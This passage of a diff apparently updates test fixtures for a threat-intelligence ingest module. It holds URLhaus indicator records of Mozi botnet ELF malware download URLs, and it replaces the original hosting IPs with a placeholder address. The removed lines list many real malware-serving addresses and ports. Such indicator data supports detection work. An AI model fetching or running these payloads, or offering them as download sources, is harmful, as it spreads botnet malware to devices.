"{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://89.160.20.156:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20315,18 +20315,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.129.18:50336/Mozi.m", + "original": "http://89.160.20.156:50336/Mozi.m", "scheme": "http", "port": 50336, - "domain": "115.55.129.18", - "full": "http://115.55.129.18:50336/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50336/Mozi.m" }, - "ip": "115.55.129.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694036294Z", - "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://115.55.129.18:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.129.18\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027576400Z", + "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://89.160.20.156:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20364,18 +20364,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://116.73.59.171:34233/Mozi.a", + "original": "http://89.160.20.156:34233/Mozi.a", "scheme": "http", "port": 34233, - "domain": "116.73.59.171", - "full": "http://116.73.59.171:34233/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34233/Mozi.a" }, - "ip": "116.73.59.171" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694039701Z", - "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://116.73.59.171:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"116.73.59.171\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027583300Z", + "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://89.160.20.156:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20413,18 +20413,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.208.132.85:38392/Mozi.m", + "original": "http://89.160.20.156:38392/Mozi.m", "scheme": "http", "port": 38392, - "domain": "117.208.132.85", - "full": "http://117.208.132.85:38392/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38392/Mozi.m" }, - "ip": "117.208.132.85" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694042917Z", - "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://117.208.132.85:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.208.132.85\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027590200Z", + "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://89.160.20.156:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20462,18 +20462,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.173.218:52654/Mozi.m", + "original": "http://89.160.20.156:52654/Mozi.m", "scheme": "http", "port": 52654, - "domain": "117.222.173.218", - "full": "http://117.222.173.218:52654/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52654/Mozi.m" }, - "ip": "117.222.173.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694046072Z", - "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://117.222.173.218:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.173.218\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027597200Z", + "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://89.160.20.156:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20511,18 +20511,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.200.9:60203/Mozi.m", + "original": "http://89.160.20.156:60203/Mozi.m", "scheme": "http", "port": 60203, - "domain": "117.247.200.9", - "full": "http://117.247.200.9:60203/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60203/Mozi.m" }, - "ip": "117.247.200.9" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694049309Z", - "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://117.247.200.9:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.200.9\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027604200Z", + "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://89.160.20.156:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20560,18 +20560,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://120.85.187.191:48091/Mozi.a", + "original": "http://89.160.20.156:48091/Mozi.a", "scheme": "http", "port": 48091, - "domain": "120.85.187.191", - "full": "http://120.85.187.191:48091/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48091/Mozi.a" }, - "ip": "120.85.187.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694063415Z", - "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://120.85.187.191:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"120.85.187.191\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027611200Z", + "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://89.160.20.156:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20609,18 +20609,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://111.241.105.88:40783/Mozi.m", + "original": "http://89.160.20.156:40783/Mozi.m", "scheme": "http", "port": 40783, - "domain": "111.241.105.88", - "full": "http://111.241.105.88:40783/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40783/Mozi.m" }, - "ip": "111.241.105.88" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694069647Z", - "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://111.241.105.88:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"111.241.105.88\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027618Z", + "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://89.160.20.156:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20658,18 +20658,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.88.36.206:52015/Mozi.m", + "original": "http://89.160.20.156:52015/Mozi.m", "scheme": "http", "port": 52015, - "domain": "113.88.36.206", - "full": "http://113.88.36.206:52015/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52015/Mozi.m" }, - "ip": "113.88.36.206" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694096547Z", - "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://113.88.36.206:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.88.36.206\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027625300Z", + "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://89.160.20.156:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20707,18 +20707,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.143.251:42987/Mozi.m", + "original": "http://89.160.20.156:42987/Mozi.m", "scheme": "http", "port": 42987, - "domain": "59.99.143.251", - "full": "http://59.99.143.251:42987/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42987/Mozi.m" }, - "ip": "59.99.143.251" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694106326Z", - "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://59.99.143.251:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.143.251\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027632200Z", + "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://89.160.20.156:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20756,18 +20756,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.94.180.106:53388/Mozi.m", + "original": "http://89.160.20.156:53388/Mozi.m", "scheme": "http", "port": 53388, - "domain": "59.94.180.106", - "full": "http://59.94.180.106:53388/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53388/Mozi.m" }, - "ip": "59.94.180.106" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694110984Z", - "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://59.94.180.106:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.94.180.106\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027639300Z", + "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://89.160.20.156:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20805,18 +20805,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://36.224.231.40:44124/Mozi.a", + "original": "http://89.160.20.156:44124/Mozi.a", "scheme": "http", "port": 44124, - "domain": "36.224.231.40", - "full": "http://36.224.231.40:44124/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44124/Mozi.a" }, - "ip": "36.224.231.40" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694114802Z", - "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://36.224.231.40:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"36.224.231.40\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027646100Z", + "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://89.160.20.156:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20854,18 +20854,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://223.212.211.103:33802/Mozi.m", + "original": "http://89.160.20.156:33802/Mozi.m", "scheme": "http", "port": 33802, - "domain": "223.212.211.103", - "full": "http://223.212.211.103:33802/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33802/Mozi.m" }, - "ip": "223.212.211.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694119530Z", - "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://223.212.211.103:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"223.212.211.103\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027653Z", + "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://89.160.20.156:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20903,18 +20903,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.95.124:43806/Mozi.m", + "original": "http://89.160.20.156:43806/Mozi.m", "scheme": "http", "port": 43806, - "domain": "59.99.95.124", - "full": "http://59.99.95.124:43806/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43806/Mozi.m" }, - "ip": "59.99.95.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694123187Z", - "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://59.99.95.124:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.95.124\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027659900Z", + "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://89.160.20.156:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -20952,18 +20952,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.169.13:52278/Mozi.m", + "original": "http://89.160.20.156:52278/Mozi.m", "scheme": "http", "port": 52278, - "domain": "59.97.169.13", - "full": "http://59.97.169.13:52278/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52278/Mozi.m" }, - "ip": "59.97.169.13" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694126483Z", - "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://59.97.169.13:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.169.13\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027666800Z", + "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://89.160.20.156:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21001,18 +21001,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://39.64.134.162:41202/Mozi.m", + "original": "http://89.160.20.156:41202/Mozi.m", "scheme": "http", "port": 41202, - "domain": "39.64.134.162", - "full": "http://39.64.134.162:41202/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41202/Mozi.m" }, - "ip": "39.64.134.162" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694129990Z", - "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://39.64.134.162:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"39.64.134.162\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027673700Z", + "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://89.160.20.156:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21050,18 +21050,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.117.84.206:35756/Mozi.m", + "original": "http://89.160.20.156:35756/Mozi.m", "scheme": "http", "port": 35756, - "domain": "182.117.84.206", - "full": "http://182.117.84.206:35756/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35756/Mozi.m" }, - "ip": "182.117.84.206" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694133547Z", - "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://182.117.84.206:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.117.84.206\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027680600Z", + "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://89.160.20.156:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21099,18 +21099,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.61:40569/Mozi.m", + "original": "http://89.160.20.156:40569/Mozi.m", "scheme": "http", "port": 40569, - "domain": "186.33.123.61", - "full": "http://186.33.123.61:40569/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40569/Mozi.m" }, - "ip": "186.33.123.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694136863Z", - "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://186.33.123.61:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.61\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027687600Z", + "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://89.160.20.156:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21148,18 +21148,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.112.20.174:47645/Mozi.m", + "original": "http://89.160.20.156:47645/Mozi.m", "scheme": "http", "port": 47645, - "domain": "182.112.20.174", - "full": "http://182.112.20.174:47645/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47645/Mozi.m" }, - "ip": "182.112.20.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694140420Z", - "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://182.112.20.174:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.112.20.174\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027694600Z", + "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://89.160.20.156:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -21197,18 +21197,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.13.77.167:40023/Mozi.m", + "original": "http://89.160.20.156:40023/Mozi.m", "scheme": "http", "port": 40023, - "domain": "123.13.77.167", - "full": "http://123.13.77.167:40023/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40023/Mozi.m" }, - "ip": "123.13.77.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694143696Z", - "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://123.13.77.167:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.13.77.167\",\"date_added\":\"2021-01-14 17:35:05 